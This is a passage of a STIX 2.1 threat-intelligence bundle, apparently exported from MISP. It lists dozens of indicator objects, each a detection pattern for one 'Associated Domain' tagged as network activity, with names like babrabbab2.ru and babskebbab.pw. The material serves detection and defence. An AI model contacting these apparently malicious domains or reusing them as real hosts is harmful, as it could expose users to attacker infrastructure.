|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c57-d1bc-4854-832f-42cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplihbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c58-8608-4680-b2c1-434d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplohbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c59-db3c-4f28-9d0c-439d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babplulbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5a-9578-442b-bf57-4877950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpohbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5b-e6a8-4ba7-a600-4904950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprabbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5c-4ba0-49fa-9571-42c1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprebbab.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5d-bce0-48fe-a95b-4381950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprebbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5e-5284-4f74-8aa2-4d72950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprehbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5e-d744-4c52-9939-406f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpribbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c5f-4680-41b9-a0d3-4542950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprihbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c60-1238-4d71-ba09-41dd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babprulbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c61-d538-48ef-a219-45ed950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babpulbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c62-a250-4afe-8d69-4e4b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrabbab2.ru']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c63-585c-49c3-8fc6-455c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrebbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c64-aaf4-4145-afc4-4580950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrebbab2.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c65-dd3c-416d-8193-4b15950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrehbab.org']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c65-60b0-4897-b06a-4c33950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babribbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c66-b374-481d-94fe-4c0c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrihbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c67-2ff4-4171-b915-4758950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrohbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c68-5950-485b-8f67-437f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babrulbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c69-81b8-4fd6-baa0-4ff8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsabbab2.ua']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6a-93cc-4b92-b30b-4ec2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsahbab.host']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6a-b24c-44d8-a66b-4492950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsebbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6b-89a0-4d24-87c2-41b0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsebbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6c-0b3c-4f48-a7e8-41cf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsehbab.com']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6d-f134-4903-959f-43fe950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsibbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6e-e290-4f9a-8be1-48c8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babsihbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6f-bb08-4cbc-bb18-4bf3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskabbab2.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c6f-5f1c-4bc6-b447-4634950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskebbab.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c70-3880-4ae2-8ccb-4c00950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskebbab2.pw']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c71-dfac-40a6-a4e8-4d0d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskehbab.top']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c72-7c58-43e8-9069-4d3f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskibbab.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c73-79c8-492a-87fb-4d91950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babskihbab.link']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c74-62d4-4195-a4c2-4a4a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babslabbab2.xyz']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6c74-8308-45a9-8929-4c63950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated Domains",
|
|
"pattern": "[domain-name:value = 'babslebbab2.rocks']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"domain\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
